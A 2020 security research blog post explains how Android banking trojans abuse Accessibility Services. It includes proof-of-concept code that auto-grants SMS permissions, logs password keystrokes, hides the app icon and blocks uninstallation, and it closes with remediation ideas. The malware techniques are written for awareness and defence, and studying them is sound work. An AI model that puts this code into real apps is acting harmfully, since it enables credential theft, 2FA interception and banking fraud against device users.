How are we doing with Android's overlay attacks in 2020?

By Emilian Cebuc on 27 March, 2020


Browsing the Internet, sifting through Android news and security articles (as you normally do on a Saturday afternoon), you come across all sorts of things. In my case, I stumbled across an article describing some 2018 Android malware involving a series of application overlay attacks on the PayPal app. The attackers were somehow able to perform a payment in the app, evading even the SMS 2FA step. I was very much aware of the clickjacking-style overlay attacks that have plagued the Android platform in the past, but this one seemed quite different, apparently making use of some legitimate functionality in Android. I found the topic very interesting, so I decided to delve a bit more into it.

So, overlays…

In the past, overlay attacks had to exploit bugs in the Android OS code that allowed an attacker to draw benign-looking pop-ups over dangerous ones. This deceived the victim into clicking “through” them and performing a specific action (such as accepting a permission). Amar Menezes’s research on the matter is an example of this. However, all this now appears to be possible via a regular Android OS feature.

The information reported here is not novel per se: these techniques have already been used in the wild by several Android malware variants. However, most of the articles found on security news websites simply report on these attacks, and there’s not much information about how exactly they worked internally. One can find some handpicked snippets of obfuscated code from the reverse-engineered malware, but even if you know Android and Java, you still don’t get a clear picture at all. My aim was to understand how they worked and how much of this is still possible on Android phones in 2020, and to raise awareness by recreating the malicious actions in cleartext PoC code, so that people can get a better idea of how they operate.

Looking at a few malware variants

Starting from the specific piece of malware that our client was concerned about, I ended up looking at a whole bunch of different families. These were reported to have been active in the wild from around spring 2018, with the most recent known variants dating from December 2019. They seem to have stemmed from the “Anubis” malware, given that almost perfectly identical code was found in some variants.

These trojans targeted users and operated through techniques which changed and evolved over time. However, the primary aim they all had in common was that of serving as banking trojans. Below is a list of the main techniques used by these malware families. While there were some smaller versions focused on only one functionality/attack, most variants used a combination of:

  • Basic phishing attempts, masquerading as popular apps such as WhatsApp, Skype, Google, etc., and asking victims to insert their card information to “validate account information”, as can be seen below:
  • Keylogging functionality, similar to the previous attacks, with a fake login page in an attempt to retrieve credentials, again masquerading either as social networking applications or as banking ones
  • Performing overlay actions on legitimate banking applications, attempting payment journeys
  • Using the old trick of over-requesting permissions (particularly SMS) and hoping the victim user would still grant them; this was to either intercept SMS messages (e.g. to read 2FA codes for banking apps), or send SMSs to spread the malware further to the victim’s contacts

Overlay attacks normally consist of a malicious application/user somehow being able to perform actions on behalf of the victim. This usually takes the form of an imitation app or a WebView launched “on-top” of a legitimate application (such as a banking app). However, as we’ll see later on, overlay attacks can also consist of actually emulating screen presses over specific windows, buttons, etc., effectively performing a journey (for instance that of completing a payment) without the user really being able to act upon it, or sometimes even realising it is happening. It is often possible to notice this “on-top” behaviour of an overlay app, and its presence in the “Recent Apps” drawer right after the legitimate one, as shown below:

As mentioned earlier, the malware variants made use of one or a combination of the techniques listed above. Most of the time the application would bypass Google Play Store’s security controls by not actually containing any malicious code itself, and instead connecting to an attacker’s C2 server after installation. The server would then start sending instructions and commands to the trojan, based on what it was intended for.

An example would be the social networking replicas, which would tell the C2 server what social apps the victim had installed on their device (say, WhatsApp), and the C2 server would then send the WhatsApp-looking phishing Activity (Android’s term for a stand-alone UI “page” of an app) to be displayed to the user. Another example would be one of the many versions of the “Ginp” malware, which targeted users of several Spanish banks through the same C2 technique, and WebView overlays. Below are a few screenshots showing two of these bank login pages replicated:

Overlay attacks and Android Accessibility Services

From my research, these trojans all seemed to take advantage of Android’s Accessibility Services (AAS) to some extent, yet most of the time it was only to figure out which app the user currently had open, in order to communicate it to the C2 server. Why they limited themselves to this was still unclear to me.

Which brings us to the star of this research: Android’s Accessibility Services. This is a feature designed to help users with visual, hearing and other types of disabilities. It requires the user to enable it in the Settings, via a single but descriptive pop-up (keep this in mind, it’s essential for later on). Most people have heard about it, and they might know/expect that it might:

  • read aloud text from the screen
  • change some display options (text size, highlighting, colours, layout disposition) to enhance visibility
  • perform voice and gesture recognition

But the more I kept seeing it mentioned, the more it started to reveal itself as an extremely powerful and dangerous feature that allows many more actions than the ones I’ve listed above. First of all, since the AAS feature is a service, it can perform actions in the background and only when needed, which makes it less noticeable. Additionally, the various articles I read mentioned:

  • reading the content of TextViews (fair enough, one could extract sensitive info with that)
  • writing into input fields (uh-oh…)
  • blocking users from accessing pages (like never being able to uninstall/stop it anymore?)
  • auto-granting itself additional runtime permissions (BIG uh-oh…), and
  • performing actual gestures on the screen “for you” (swiping, tapping buttons, activating/focusing certain areas on screen, etc.).

You might understand my confusion as someone who was trying to understand how these trojans worked. Why would most malware variants only use AAS to get the app’s package name, and proceed with “traditional” phishing pages, when it seemed you could do so much more? So instead of using a complex setup of multiple elements (connections to C2 servers, phishing HTML WebViews, pre-crafting them to resemble targeted apps, keylogging implemented into those, etc.), could I create a basic app that would make use of only AAS to do all the major dangerous actions? AAS just seemed “too good to be true” - surely there was no way only one feature could allow you to do all that, right?

And now for the “juicy” stuff

The hardest part was understanding how the AAS feature operates on the system and screen views. While the Google documentation is often well-organized, it can also be confusing, convoluted or simply not detailed enough, causing headaches even for more experienced Android programmers. After sifting through all the resources I could find, I decided to create a victim application as well as a “malicious” one, implementing an accessibility service that could:

  • take the user straight to the Accessibility Settings page, and then direct them out of it as soon as they accepted the permission (effectively preventing the user from going back and disabling/uninstalling the app)
  • read and modify the characters in a password-style input field of the victim app
  • request a runtime permission and attempt to automatically grant it, clicking on the “Yes” button

Let’s now step through that implementation by looking at some code :)

First, we implement an Accessibility-enabled service in our application:

public class MyAccessibilityService extends AccessibilityService {

In our app’s manifest file, we have to declare our service, as well as a configuration file for it. This specifies the kind of access we want our service to have, and what actions it should be able to perform. The following is the app’s service declaration in the AndroidManifest.xml file:

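<service android:name=".MyAccessibilityService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
<intent-filter><action android:name="android.accessibilityservice.AccessibilityService" /></intent-filter>
<meta-data android:name="android.accessibilityservice" android:resource="@xml/accessibility_service_config" />
</service>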

Below is the accessibility_service_config.xml we created for our AAS service:

<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"


Let’s break down what all these values mean:

  • packageNames: this attribute allows us to specify the package names of applications if we want our service to only target those. If absent, all apps present on the device are “in scope”
  • canRetrieveWindowContent: attribute essential to allow the service to retrieve content (such as views) from the active window the user is on
  • canPerformGestures: allows the service to actually perform gestures on behalf of the user
  • accessibilityEventTypes: declares which types of AccessibilityEvents the app is allowed to observe (we’ll get back to these later on). These options are very granular, and were set to see all, for the purpose of debugging and understanding AAS
  • accessibilityFlags: set to include as many types of views as possible, in order to be able to intercept anything we might need. We’ll get back to these as well.

We mentioned how the only requirement for AAS is that it needs to be enabled by the user in the settings menu. In the app’s MainActivity (the one marked in the manifest as the LAUNCHER activity), it is possible to take the user straight to the Accessibility settings page upon first launch. Luckily, a message can be shown in order to explain why the Accessibility Services are needed, preferably reassuring the user about whatever “innocuous” actions your app will do. Below is a code snippet of how this can be achieved:

// ask user to enable it and take them to the settings page
Toast.makeText(this, "Please enable the accessibility settings " +
        "to take advantage of this app's fantastic features", Toast.LENGTH_LONG).show();
Intent openSettingsIntent = new Intent(Settings.ACTION_ACCESSIBILITY_SETTINGS);
// launch the system Accessibility settings screen
startActivity(openSettingsIntent);

The Accessibility settings have significant layout and UI differences depending on the device in question, but in general it will display a list of installed apps which have an Accessibility Service component, including our “AAS Overlays” app. When the user is about to enable it, they will see a pop-up (as can be seen below):  

The pop-up explicitly states what type of permissions the app is requesting (i.e. the ones we’ve set to “true” in the service’s configuration file). There is no way for an attacker to programmatically accept this request, nor can they manipulate the text fields displaying the permission descriptions.

However, the user can be further tricked into thinking the displayed permissions are “expected” or “necessary” by carefully choosing a convincing name for the application, which will appear in the pop-up title. So, a fake battery app needing to analyse usage and provide statistics, or something like “Adobe Flash Player” could easily fool someone into thinking that it should be able to read and edit the screen content: 

Once the user has granted this permission, our Accessibility service is started, and the onServiceConnected() method is called. We can override it to include some functionality we want to be executed straight away, such as informing the main thread of execution (perhaps through a broadcast Intent to MainActivity) that the service has indeed been started and therefore the AAS-dependent functionality can now proceed.

Meanwhile, you may want to hide the app’s icon from the App drawer, so the user cannot easily see it and try to uninstall it. You can do this in the MainActivity class:

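PackageManager p = getPackageManager();

// activity which is first opened at launch - in the manifest it is declared with
// <category android:name="android.intent.category.LAUNCHER" />
ComponentName componentName = new ComponentName(this, MainActivity.class);
// disabling the launcher component removes the icon from the app drawer
p.setComponentEnabledSetting(componentName,
        PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);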

Alright, so about those window layouts…

Now before we move on, to understand how content on the screen can be manipulated/interacted with, we need to understand a bit about how AAS sees what appears on the screen of a device. There are two main concepts here: Accessibility events, and the parent-children UI layout concept.

AccessibilityEvents are system events triggered when something happens to the content appearing on the screen. These can be of several types, but three are of interest when it comes to views:


While the exact definition and extent of each of these types remain unclear, what I was able to figure out was that TYPE_WINDOW_STATE_CHANGED is fired every time there is a complete change in the view, i.e. any time a new Activity has been launched, such as by navigating to a different page in the same app, or switching to a different application.

The TYPE_WINDOW_CONTENT_CHANGED instead is fired every time there’s a modification, of any kind, to what is displayed in the current activity. This should include any key press resulting in a character appearing in an input field, any pop-up, any button clicked, etc. I am certain there is more to it, but for now this is all the information we need.

In terms of layout, the Android system sees every change (read “re-render”) to what is displayed on the screen as a collection of objects, each one a “child” of the previous node and a “parent” to the next. The “parent” of all these objects is effectively the entire usable layout space between the notification bar and the bottom of the screen (or the soft buttons, if present); for programmers familiar with Android, this is the ConstraintLayout object, which of course contains everything else. Depending on the running Android version, this “allfather” node is called either “source” or “rootWindow”, is of type AccessibilityNodeInfo, and you get it from the AccessibilityEvent I mentioned before.

Here is a high-level example:

  • You get an AccessibilityEvent of TYPE_WINDOW_STATE_CHANGED
  • That means most probably the Activity changed
  • If you retrieve the AccessibilityEvent’s source/rootWindow, it will most probably be the general ConstraintLayout of the new activity that appeared
  • This object can now give us information such as this new activity’s full name, as well as the package it belongs to
  • This is what AAS uses to determine the current application the user is now on
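
The steps above can be condensed into a few lines of state tracking. The following is a minimal plain-Java sketch of that logic, runnable without the Android SDK. WindowEvent and EventKind are hypothetical stand-ins for AccessibilityEvent and its TYPE_* constants, and the package and class names are made-up examples, so treat it as a model of the idea rather than the PoC’s actual code:

```java
// Hypothetical stand-ins for AccessibilityEvent and its TYPE_* constants.
enum EventKind { WINDOW_STATE_CHANGED, WINDOW_CONTENT_CHANGED }

final class WindowEvent {
    final EventKind kind;
    final String packageName; // may be null, as it can be on Android
    final String className;

    WindowEvent(EventKind kind, String packageName, String className) {
        this.kind = kind;
        this.packageName = packageName;
        this.className = className;
    }
}

final class ForegroundModel {
    private final String targetPackage;
    private String currentActivity = "";

    ForegroundModel(String targetPackage) {
        this.targetPackage = targetPackage;
    }

    // Remember the class name only when a new window appears in the target package.
    void onEvent(WindowEvent event) {
        if (event.kind == EventKind.WINDOW_STATE_CHANGED
                && targetPackage.equals(event.packageName)) {
            currentActivity = event.className;
        }
    }

    String currentActivity() {
        return currentActivity;
    }

    public static void main(String[] args) {
        ForegroundModel model = new ForegroundModel("com.example.victim");
        model.onEvent(new WindowEvent(EventKind.WINDOW_STATE_CHANGED,
                "com.example.victim", "com.example.victim.LoginActivity"));
        // A content change inside the same window does not alter the tracked activity.
        model.onEvent(new WindowEvent(EventKind.WINDOW_CONTENT_CHANGED,
                "com.example.victim", "android.widget.EditText"));
        System.out.println(model.currentActivity());
    }
}
```

Keeping the “which activity is on screen” state separate from the content-change handling is a design choice of this sketch: content changes fire far more often, so they only read the state that window changes write.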

A second high-level example:

  • You get an AccessibilityEvent of TYPE_WINDOW_CONTENT_CHANGED
  • This means something inside our current activity has changed, maybe we have just typed in one new character into an input field
  • We can get the source/rootWindow from the event, and then we can iterate through all its child node objects, most probably again the ConstraintLayout containing all the other views and fields. The blueprint of an Android activity below will hopefully help with understanding the hierarchy of these layout objects:

Let’s break down this child nodes hierarchy:

  • The ConstraintLayout is everything in between the green title bar with the application title (“AAS-Victim-App”), and the “Back-Home-Recents” software buttons; it contains
  • The container with the static text box and two input fields; of these,
  • The one TextView “area” (pass_view) representing the password input field, and in it
  • The input field itself (i.e. the line with the password hint, on top of which text appears as we type)
  • The actual typed characters inside the field:

We can now see only the last character that has been added.
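
To make the parent/child idea more concrete, here is a minimal plain-Java sketch of a depth-first walk over such a tree. ModelNode is a hypothetical stand-in for AccessibilityNodeInfo (on a real device you would walk the tree with getChildCount() and getChild()), and the layout built in main() is an assumption that only loosely follows the breakdown above:

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical stand-in for AccessibilityNodeInfo: a class name, optional text, child nodes.
final class ModelNode {
    final String className;
    final String text; // null when the node carries no text
    final List<ModelNode> children = new ArrayList<>();

    ModelNode(String className, String text) {
        this.className = className;
        this.text = text;
    }

    ModelNode add(ModelNode child) {
        children.add(child);
        return this; // returning the parent allows chained add() calls
    }
}

final class NodeTreeWalk {
    // Depth-first walk: appends one line per node, indented two spaces per level.
    static void dump(ModelNode node, int depth, List<String> out) {
        StringBuilder line = new StringBuilder();
        for (int i = 0; i < depth; i++) {
            line.append("  ");
        }
        line.append(node.className);
        if (node.text != null) {
            line.append(" \"").append(node.text).append('"');
        }
        out.add(line.toString());
        for (ModelNode child : node.children) {
            dump(child, depth + 1, out);
        }
    }

    public static void main(String[] args) {
        // Assumed layout: a root container, an inner container, one label, two inputs.
        ModelNode root = new ModelNode("ConstraintLayout", null)
                .add(new ModelNode("LinearLayout", null)
                        .add(new ModelNode("TextView", "Enter your details"))
                        .add(new ModelNode("EditText", "user"))
                        .add(new ModelNode("EditText", "\u2022\u2022\u2022s")));
        List<String> lines = new ArrayList<>();
        dump(root, 0, lines);
        for (String line : lines) {
            System.out.println(line);
        }
    }
}
```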

With the theory out of the way…

…and a better idea about Accessibility events, and parent/children objects, let’s keep going with our “malware” code. The onAccessibilityEvent() method of the service is the one to be overridden when implementing functionality for events. Let’s say we want to just passively gather information about the activities that are opening, so we can start mapping out names. First, we’ll ensure our data gets collected correctly depending on which Android version we’re running:

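public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
    AccessibilityNodeInfo nodeInfo = accessibilityEvent.getSource();
    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O && nodeInfo == null) {
        // no source node on the event: fall back to the root of the active window
        nodeInfo = getRootInActiveWindow();
    }
    // the event handling shown in the next snippets goes here
}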

Now we intercept an event of TYPE_WINDOW_STATE_CHANGED, and we save the className (i.e. the Activity full name), if the event concerns the victim application package we’re targeting.

private static final String VICTIM_APP = "com.emilian.aas_victim_app";
private static String currentVictimActivity = "";

if (accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) {
    // getPackageName() can return null, so guard before comparing
    if (accessibilityEvent.getPackageName() != null
            && accessibilityEvent.getPackageName().toString().equals(VICTIM_APP)) {
        currentVictimActivity = accessibilityEvent.getClassName().toString();
    }
}

Let’s do something considerably more dangerous. We’ll request a dangerous-level runtime permission, for example SMS, to be able to intercept 2FA codes (don’t forget to also declare it in the AndroidManifest.xml file). This will be done in our MainActivity class, as permission requests cannot be performed from within a Service:

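if (ContextCompat.checkSelfPermission(getApplicationContext(), Manifest.permission.READ_SMS)
        != PackageManager.PERMISSION_GRANTED) {
    // SMS_REQUEST_CODE is a hypothetical int constant; the original value is not shown
    ActivityCompat.requestPermissions(this,
            new String[]{Manifest.permission.READ_SMS}, SMS_REQUEST_CODE);
}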

This will spawn a pop-up for the user, informing them about the application requesting this permission, what it means, and two buttons (“Yes/No”). Back in our service, we want to intercept this pop-up window, and automatically get the AAS to perform a click on the “Yes” button, effectively auto-granting permissions to the application.

This was another one of the trickier parts: although you might expect the pop-up to be just a content change in the active window, it turns out that permission pop-ups are considered Activities in their own right, and are part of the PackageInstaller package. It was very logical once I found it, but it did take me a while to actually discover the pop-up’s full activity name to filter by (“”). Below is how we intercept the events and filter via the package and class names we’re interested in:

if (accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) {

    if (accessibilityEvent.getPackageName().toString().equals("")
            && accessibilityEvent.getClassName().toString().equals("")) {
        AccessibilityNodeInfo permissionWindowNodeInfo = accessibilityEvent.getSource();
        // the button search and click happen here, inside this block
    }
}

Now, we could iterate through all the various child nodes of permissionWindowNodeInfo, but AAS offers us two methods for doing this, “finding” node objects either by id (if we happened to know it), or by a text query. In our case we could be looking for “Allow” (the word of the button in the pop-up which would grant the permission, if clicked), as can be seen below:

The Logcat output could also be consulted to view the various events that were triggered and captured by the Service. Among these, the pop-up, with its text content visible, assuring us we have the right View object:

16292-16292/com.emilian.aasoverlays I/EVENT_TYPE:: EventType: TYPE_WINDOW_STATE_CHANGED; EventTime: 15618689; PackageName:; MovementGranularity: 0; Action: 0; ContentChangeTypes: []; WindowChangeTypes: [] [ ClassName:; Text: [Allow AAS Overlays to send and view SMS messages?]; ContentDescription: null; ItemCount: -1; CurrentItemIndex: -1; Enabled: true; Password: false; Checked: false; FullScreen: false; Scrollable: false; BeforeText: null; FromIndex: -1; ToIndex: -1; ScrollX: -1; ScrollY: -1; MaxScrollX: -1; MaxScrollY: -1; AddedCount: -1; RemovedCount: -1; ParcelableData: null ]; recordCount: 0

The findAccessibilityNodeInfosByText() and findAccessibilityNodeInfosByViewId() methods return a list of nodes that matched the search query. This leaves us with a much smaller and more relevant set of objects to go through. Further filtering can be done by checking one of the various properties a node object might have. Some of the most useful ones are:

  • isClickable – mostly for buttons, but also text fields
  • isEditable – especially useful to identify an input text field, together with isClickable
  • isEnabled
  • isPassword – refers to the special type of text fields, where all characters but the last inserted one are replaced by dots
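
The two-step approach described above (search by text, then filter by property) can be modelled in plain Java as follows. FlatNode and NodeSearch are hypothetical names, not Android classes; the only behaviour borrowed from the real API is that findAccessibilityNodeInfosByText() matches by case-insensitive containment, which is exactly why a second filter is needed: the pop-up’s question text contains the word “Allow” too.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;

// Hypothetical stand-in for AccessibilityNodeInfo with only the fields this sketch needs.
final class FlatNode {
    final String text; // may be null
    final boolean clickable;
    final boolean enabled;

    FlatNode(String text, boolean clickable, boolean enabled) {
        this.text = text;
        this.clickable = clickable;
        this.enabled = enabled;
    }
}

final class NodeSearch {
    // Step 1: case-insensitive containment match on the node text.
    static List<FlatNode> findByText(List<FlatNode> nodes, String query) {
        String needle = query.toLowerCase(Locale.ROOT);
        List<FlatNode> hits = new ArrayList<>();
        for (FlatNode node : nodes) {
            if (node.text != null && node.text.toLowerCase(Locale.ROOT).contains(needle)) {
                hits.add(node);
            }
        }
        return hits;
    }

    // Step 2: keep only the nodes that could actually be pressed.
    static List<FlatNode> onlyPressable(List<FlatNode> nodes) {
        List<FlatNode> pressable = new ArrayList<>();
        for (FlatNode node : nodes) {
            if (node.clickable && node.enabled) {
                pressable.add(node);
            }
        }
        return pressable;
    }

    public static void main(String[] args) {
        List<FlatNode> popup = new ArrayList<>();
        popup.add(new FlatNode("Allow AAS Overlays to send and view SMS messages?", false, true));
        popup.add(new FlatNode("Deny", true, true));
        popup.add(new FlatNode("Allow", true, true));

        List<FlatNode> hits = findByText(popup, "Allow");
        System.out.println("text matches: " + hits.size());
        System.out.println("pressable matches: " + onlyPressable(hits).size());
    }
}
```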

In our case, we look for our clickable button stating “Allow”, and we ask the Accessibility Service to perform a “Click” action on that node. And just like that, this is how we grant ourselves new permissions.

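List<AccessibilityNodeInfo> list = permissionWindowNodeInfo.findAccessibilityNodeInfosByText("Allow");
for (AccessibilityNodeInfo node : list) {
    if (node.isClickable()) {
        // ask the service to "click" the button on the user's behalf
        node.performAction(AccessibilityNodeInfo.ACTION_CLICK);
    }
}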

Taking advantage of the TYPE_WINDOW_CONTENT_CHANGED event, a similar technique can be used to log every key press on our password input field. This field should keep the characters hidden; however, the last character inserted is always shown in clear, and can therefore be logged. The code below interacts with this password field and gets the text present in it on each key press.

if (accessibilityEvent.getEventType() == AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED) {
    if (accessibilityEvent.getPackageName() != null
            && accessibilityEvent.getPackageName().toString().equals(VICTIM_APP)) {
        List<AccessibilityNodeInfo> list;
        switch (currentVictimActivity) {
            // VICTIM_PRIMARY_ACIVITY: String constant with the activity's full class name
            case VICTIM_PRIMARY_ACIVITY:
                list = nodeInfo.findAccessibilityNodeInfosByViewId(VICTIM_APP + ":id/second_activity_view");
                for (AccessibilityNodeInfo node : list) {
                    // getText() can be null while the field is empty
                    if (node.getText() != null) {
                        Toast.makeText(this, node.getText().toString(), Toast.LENGTH_LONG).show();
                    }
                }
                break;
        }
    }
}

This example also shows the usage of findAccessibilityNodeInfosByViewId(). Here we obviously need to know the exact resource id (second_activity_view) of the password TextView in our victim application, as well as the activity name held in VICTIM_PRIMARY_ACIVITY. Obtaining these would most probably require a degree of reverse engineering, or at least passive observation of the application in order to map the names of the various activities and Views of interest. In the screenshot below it is possible to see the Logcat output, with the intercepted characters forming the string “pass” as I was typing it in the victim application:
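
Why does seeing only the last character matter? Because a service that observes every content change gets to see each character once, in order. The sketch below is a plain-Java model of that reasoning, under the assumption that the user only appends characters (no deletions or cursor moves) and that each snapshot ends with the newly typed character. MaskedFieldModel and rebuild() are hypothetical names and not part of the PoC:

```java
import java.util.Arrays;
import java.util.List;

final class MaskedFieldModel {
    // Each snapshot is the field text after one key press, e.g. two dots followed by "s".
    // Only the last character is in clear, so that is the one we collect.
    static String rebuild(List<String> snapshots) {
        StringBuilder typed = new StringBuilder();
        for (String snapshot : snapshots) {
            if (snapshot != null && !snapshot.isEmpty()) {
                typed.append(snapshot.charAt(snapshot.length() - 1));
            }
        }
        return typed.toString();
    }

    public static void main(String[] args) {
        // \u2022 is the bullet character used here to represent a masked position.
        List<String> seen = Arrays.asList(
                "p", "\u2022a", "\u2022\u2022s", "\u2022\u2022\u2022s");
        System.out.println(rebuild(seen)); // prints "pass"
    }
}
```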

Finally, the last bit of code I wanted to show is:

performGlobalAction(GLOBAL_ACTION_HOME);

which effectively makes AAS emulate pressing the home key, no matter where in the app or in the system the user currently is. This is how we can achieve persistence, for instance by preventing users from uninstalling the app or manually revoking permissions we’ve auto-granted ourselves. Using one of the techniques shown before, we can code the application to “sense” when the user enters the app’s page in the settings. On this page we’d normally find the permissions menu, as well as the “uninstall” and “force stop” buttons. Therefore, we can simply emulate pressing the “Back” or “Home” buttons, effectively preventing the user from ever performing any of those actions.


So yes, as we’ve seen, we only need to fool a victim into accepting one permission, and from that moment on we can do everything else programmatically. We can:

  • read text from the screen (such as user sensitive information)
  • passively keylog anything they type in, allowing us to harvest credentials, banking apps passcodes, 2FA codes inserted (for example from card readers), etc.
  • fill in any input form, which would allow us to use the previously gathered information to log into the legitimate apps – no need to create phishing pages anymore
  • perform full journeys by pressing on buttons
  • auto-grant runtime permissions, significantly widening the range of further attack avenues (intercepting and sending SMSs, spreading to the devices of the victim’s contacts, reading logs, setting default apps, even installing other applications if the device happens to be rooted, preventing removal, and much more).

Of course, all this requires the attacker to study the targeted apps very well. A malicious developer could start with an initial phase of purely passive analysis, simply enumerating and logging the names of packages, activities and input fields of interest, as well as passively keylogging everything the user does to steal credentials, banking app passphrases and other sensitive information. Phase two would then focus on programmatically crafting the right overlay clicks and form auto-insertions (using the stolen credentials) to complete login flows, money transfer attempts, etc.

Nevertheless, it turns out all my initial “fears” were valid. During these tests I was running Android 9 on a Galaxy S8. It looks like these attacks are still very much possible in March 2020. Android’s Accessibility Services proved to be an incredible feature that can put a lot of power in the hands of a malicious user. Once you get past the big obstacle of understanding the inner workings of AAS, the potential for damage is incredibly high. What I have shown are the most essential building blocks for creating one hell of a malicious app. The video below gives a taste of how fast the runtime permission auto-granting action happens, bringing the user straight back to the home screen:


You can see something quickly flickering on your screen, but you wouldn’t be able to tell much. And even if you could, you wouldn’t really have much time to stop it; besides, it is probably quite clear by now that the process could easily be made to repeat indefinitely until the app has all the permissions it wants.

As I previously mentioned, the majority of the trojans I’ve read about did not seem to make use of the entire “arsenal” that AAS gives access to. The only piece of malware I found that did was “Ginp”, and more specifically its latest variants, which apparently were based on the same source code as the relatively older “Anubis” malware. The PayPal trojan also used gesture and touch emulation, together with text field autocompletion, to quickly add the attacker’s email to the list of payees, proceed through the app’s activities and execute a transfer. It waited for the user to log in to the legitimate app, receive an OTP code and type it in; once the login was complete, the malware would do the rest in a split second. With the code I’ve shown here, a malicious app wouldn’t even need to wait for the user to log in: it could steal their credentials and proceed to log in by itself.

Potential remediations

From what I could see, precisely because of the high level of privilege that AAS has by design, there isn’t much that developers can do to protect their applications: this is part of the Android OS itself, and only Google can come up with solutions or mitigations.

One remediation, particularly for banking apps, is forcing a user to head on to the web application if they want to add a completely new payee. That way, the mobile app could not be used for this purpose (PayPal did not enforce this, and that’s exactly what the attacks relied on).

Another idea would be to have a separate window for the payment confirmation, with a timer. This is to make it very clear to the user that a payment is about to be made. Only a “Cancel payment” button should be present. The counter-solution here could be the existence of some other AAS methods which might effectively allow changing the layout depth of a view. I was not able to try them myself yet, but if they are capable of that, then malware could “grab” the confirmation pop-up, and simply hide it “behind” the banking app. The timer could still pass, and the payment will go through.

The only “counter-counter-solution” to that approach would be an Android API that lets the payment go through only if the confirmation page keeps something like a “TASK_ON_TOP” property active the whole time. As soon as AAS tried to hide it, this property would no longer be true, and the payment would automatically be cancelled.
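
The interplay between the timed confirmation and the “must stay on top” idea can be sketched as a small state machine. This is a plain-Java model under stated assumptions: ConfirmationGuard, its method names and the millisecond timer are all hypothetical, and I am not claiming that Android exposes a “TASK_ON_TOP” property. An app would have to feed onVisibilityChanged() from whatever signal it actually trusts.

```java
final class ConfirmationGuard {
    enum State { PENDING, CANCELLED, CONFIRMED }

    private final long requiredVisibleMillis;
    private long visibleMillis = 0;
    private State state = State.PENDING;

    ConfirmationGuard(long requiredVisibleMillis) {
        this.requiredVisibleMillis = requiredVisibleMillis;
    }

    // Called whenever the confirmation window gains or loses the top position.
    void onVisibilityChanged(boolean onTop) {
        if (state == State.PENDING && !onTop) {
            state = State.CANCELLED; // hidden even once: the payment never goes through
        }
    }

    // Called periodically while the confirmation window is displayed.
    void onTick(long elapsedMillis) {
        if (state != State.PENDING) {
            return; // a final state is never left again
        }
        visibleMillis += elapsedMillis;
        if (visibleMillis >= requiredVisibleMillis) {
            state = State.CONFIRMED;
        }
    }

    // The user pressed the only button on the page, "Cancel payment".
    void onCancelPressed() {
        if (state == State.PENDING) {
            state = State.CANCELLED;
        }
    }

    State state() {
        return state;
    }

    public static void main(String[] args) {
        ConfirmationGuard guard = new ConfirmationGuard(3000);
        guard.onTick(1000);
        guard.onVisibilityChanged(false); // something pushed the window behind the app
        guard.onVisibilityChanged(true);
        guard.onTick(5000);
        System.out.println(guard.state()); // prints "CANCELLED"
    }
}
```

The point of making CANCELLED a terminal state is that bringing the window back on top afterwards cannot resurrect the payment, so hiding the pop-up “behind” the banking app no longer helps the attacker.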

Bottom line is, banks in particular as well as any other developers, should definitely be aware of these attacks, because as we’ve proven, they are very much still possible.

What is Google doing about it? Well, it was announced in 2019 that they were deprecating the overlay functionality of AAS in Android Q (10). Furthermore, they also added a limitation which apparently automatically revokes the accessibility permission if it is requested more than 30 seconds after the app is launched. However, it would appear that if the malicious app requests permissions (and the victim grants them) immediately after launch (as was the case with my PoC), then this remediation is still quite useless.

All devices which will not receive the update are going to remain vulnerable indefinitely. As Android 10 is currently the latest release, and therefore has the smallest user base for now (no official figures yet, but safe to assume <10%), this is a real problem.